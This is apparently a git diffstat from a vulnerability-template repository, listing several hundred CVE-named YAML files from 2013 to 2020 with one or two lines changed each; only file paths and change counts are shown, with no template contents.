http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-100004.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 4 ++-- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4577.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4941.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 4 ++-- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5181.yaml | 2 +- http/cves/2014/CVE-2014-5187.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2014/CVE-2014-9735.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-10141.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2794.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8350.yaml | 4 ++-- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9406.yaml | 2 +- http/cves/2015/CVE-2015-9415.yaml | 2 +- http/cves/2015/CVE-2015-9499.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10976.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-15042.yaml | 4 ++-- http/cves/2016/CVE-2016-15043.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 4 ++-- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-9299.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11107.yaml | 4 ++-- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 4 ++-- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14725.yaml | 2 +- http/cves/2017/CVE-2017-14942.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17092.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17762.yaml | 4 ++-- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18349.yaml | 4 ++-- http/cves/2017/CVE-2017-18362.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18580.yaml | 4 ++-- http/cves/2017/CVE-2017-18590.yaml | 4 ++-- http/cves/2017/CVE-2017-18598.yaml | 4 ++-- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-20192.yaml | 4 ++-- http/cves/2017/CVE-2017-20194.yaml | 2 +- http/cves/2017/CVE-2017-3131.yaml | 2 +- http/cves/2017/CVE-2017-3132.yaml | 2 +- http/cves/2017/CVE-2017-3133.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 4 ++-- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5868.yaml | 2 +- http/cves/2017/CVE-2017-5871.yaml | 2 +- http/cves/2017/CVE-2017-5983.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9965.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-11133.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11511.yaml | 2 +- http/cves/2018/CVE-2018-11686.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-1217.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12455.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-13317.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 4 ++-- http/cves/2018/CVE-2018-14728.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15811.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17082.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17173.yaml | 2 +- http/cves/2018/CVE-2018-17283.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18325.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19127.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 4 ++-- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-25114.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6882.yaml | 2 +- http/cves/2018/CVE-2018-6961.yaml | 4 ++-- http/cves/2018/CVE-2018-7192.yaml | 4 ++-- http/cves/2018/CVE-2018-7193.yaml | 2 +- http/cves/2018/CVE-2018-7196.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7314.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7765.yaml | 2 +- http/cves/2018/CVE-2018-7841.yaml | 4 ++-- http/cves/2018/CVE-2018-8024.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 4 ++-- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9206.yaml | 4 ++-- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2019-10647.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-1003000.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 4 ++-- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11253.yaml | 4 ++-- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11507.yaml | 4 ++-- http/cves/2019/CVE-2019-11510.yaml | 4 ++-- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-11886.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 4 ++-- http/cves/2019/CVE-2019-12935.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 4 ++-- http/cves/2019/CVE-2019-12989.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 4 ++-- http/cves/2019/CVE-2019-14206.yaml | 4 ++-- http/cves/2019/CVE-2019-14223.yaml | 4 ++-- http/cves/2019/CVE-2019-14251.yaml | 4 ++-- http/cves/2019/CVE-2019-14312.yaml | 4 ++-- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14950.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15774.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-17228.yaml | 2 +- http/cves/2019/CVE-2019-17230.yaml | 2 +- http/cves/2019/CVE-2019-17231.yaml | 2 +- http/cves/2019/CVE-2019-17232.yaml | 2 +- http/cves/2019/CVE-2019-17233.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17564.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19822.yaml | 2 +- http/cves/2019/CVE-2019-19825.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20504.yaml | 2 +- http/cves/2019/CVE-2019-25141.yaml | 2 +- http/cves/2019/CVE-2019-25152.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2725.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 4 ++-- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5129.yaml | 2 +- http/cves/2019/CVE-2019-5591.yaml | 4 ++-- http/cves/2019/CVE-2019-6703.yaml | 4 ++-- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2019/CVE-2019-7195.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 4 ++-- http/cves/2019/CVE-2019-8451.yaml | 4 ++-- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-9082.yaml | 4 ++-- http/cves/2019/CVE-2019-9194.yaml | 4 ++-- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9879.yaml | 2 +- http/cves/2019/CVE-2019-9880.yaml | 2 +- http/cves/2019/CVE-2019-9912.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10257.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10987.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11441.yaml | 2 +- http/cves/2020/CVE-2020-11515.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11975.yaml | 4 ++-- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12262.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 4 ++-- http/cves/2020/CVE-2020-12832.yaml | 4 ++-- http/cves/2020/CVE-2020-13121.yaml | 4 ++-- http/cves/2020/CVE-2020-13125.yaml | 4 ++-- http/cves/2020/CVE-2020-13158.yaml | 4 ++-- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13886.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 4 ++-- http/cves/2020/CVE-2020-14181.yaml | 4 ++-- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15906.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19363.yaml | 4 ++-- http/cves/2020/CVE-2020-1943.yaml | 4 ++-- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-20601.yaml | 2 +- http/cves/2020/CVE-2020-20627.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-21998.yaml | 2 +- http/cves/2020/CVE-2020-22165.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23814.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24285.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24881.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 4 ++-- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25200.yaml | 4 ++-- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 4 ++-- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-26073.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26836.yaml | 2 +- http/cves/2020/CVE-2020-26879.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29214.yaml | 2 +- http/cves/2020/CVE-2020-29279.yaml | 2 +- http/cves/2020/CVE-2020-29390.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-35131.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-36333.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-36723.yaml | 2 +- http/cves/2020/CVE-2020-36728.yaml | 2 +- http/cves/2020/CVE-2020-36836.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- 